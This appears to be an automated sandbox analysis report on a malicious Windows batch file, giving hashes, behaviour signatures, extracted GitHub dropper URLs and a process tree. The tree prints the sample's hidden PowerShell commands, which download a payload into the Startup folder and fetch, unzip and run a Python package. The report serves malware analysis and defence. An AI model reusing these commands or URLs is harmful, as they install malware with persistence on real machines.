Overview

overview

10

Static

static

1

462fdb8685...40.bat

windows7-x64

10

462fdb8685...40.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    05/06/2024, 14:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat

  • Size

    28KB

  • MD5

    4bbf7218eb67763078c0a6c9a4d27ee2

  • SHA1

    e1a571c79b74cb842071b90e1d6c8407a25e5459

  • SHA256

    462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340

  • SHA512

    cb1d1c0c279d68ce02122c73d195ec1503cbe347bfb2bbd64cfa5e7108617b21eac96a848ba6ee4109d350458331b3a2f1a2a65c7463db7494ba82ae4761045b

  • SSDEEP

    192:ovUjBvkHo0JHs1VtLX8gY7SoZfTU+yFe7dXTT8dPwQ4gH:ocjJkHohTLX8f7SoZQ+yFe7Jf+PZrH

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/sdvsdv23rbfdb3/kjkj/raw/main/1

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/bao3125/Post/raw/main/Document.zip

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Drops startup file 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\Windows\system32\chcp.com
      chcp.com 437
      2⤵
        PID:2412
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c type tmp
        2⤵
          PID:2240
        • C:\Windows\system32\findstr.exe
          findstr /L /I set C:\Users\Admin\AppData\Local\Temp\462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat
          2⤵
            PID:3036
          • C:\Windows\system32\findstr.exe
            findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat
            2⤵
              PID:3016
            • C:\Windows\system32\findstr.exe
              findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat
              2⤵
                PID:2556
              • C:\Windows\system32\findstr.exe
                findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat
                2⤵
                  PID:2344
                • C:\Windows\system32\find.exe
                  fiNd
                  2⤵
                    PID:2152
                  • C:\Windows\system32\find.exe
                    fInd
                    2⤵
                      PID:1420
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c type tmp
                      2⤵
                        PID:2580
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/sdvsdv23rbfdb3/kjkj/raw/main/1', 'C:\Users\Admin\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat')"
                        2⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Drops startup file
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2576
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/bao3125/Post/raw/main/Document.zip', 'C:\Users\Public\Document.zip')"
                        2⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2492
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2544
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\python.exe C:\Users\Public\Document\Lib\sim.py"
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2068

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Temp\tmp
                      Filesize

                      14B

                      MD5

                      ce585c6ba32ac17652d2345118536f9c

                      SHA1

                      be0e41b3690c42e4c0cdb53d53fc544fb46b758d

                      SHA256

                      589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

                      SHA512

                      d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

                      Download Submit

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                      Filesize

                      7KB

                      MD5

                      19ffe2ac25a39d6099a6696356731921

                      SHA1

                      48e5afd31cc13e1b252f34beea6bb66a06f6eb5a

                      SHA256

                      99b7ad6069d7e36ce630f9b949898c642f97b6b4ea36815c0c9fe0d620cea60f

                      SHA512

                      c65908e5d5a5590402a6657275781e70cdbc8ba17209c1bb8a46899a10c1d3d7418b55aff570cd5e554d40044f06aac0ede6f5d8b242915c60eb82ebe2fef61a

                      Download Submit

                    • memory/2492-17-0x000000001B700000-0x000000001B9E2000-memory.dmp

                      Filesize

                      2.9MB

                      Download

                    • memory/2492-18-0x0000000002820000-0x0000000002828000-memory.dmp

                      Filesize

                      32KB

                      Download

                    • memory/2576-8-0x0000000002EB0000-0x0000000002F30000-memory.dmp

                      Filesize

                      512KB

                      Download

                    • memory/2576-9-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

                      Filesize

                      2.9MB

                      Download

                    • memory/2576-10-0x0000000001D20000-0x0000000001D28000-memory.dmp

                      Filesize

                      32KB

                      Download

                    • memory/2576-11-0x0000000002EB0000-0x0000000002F30000-memory.dmp

                      Filesize

                      512KB

                      Download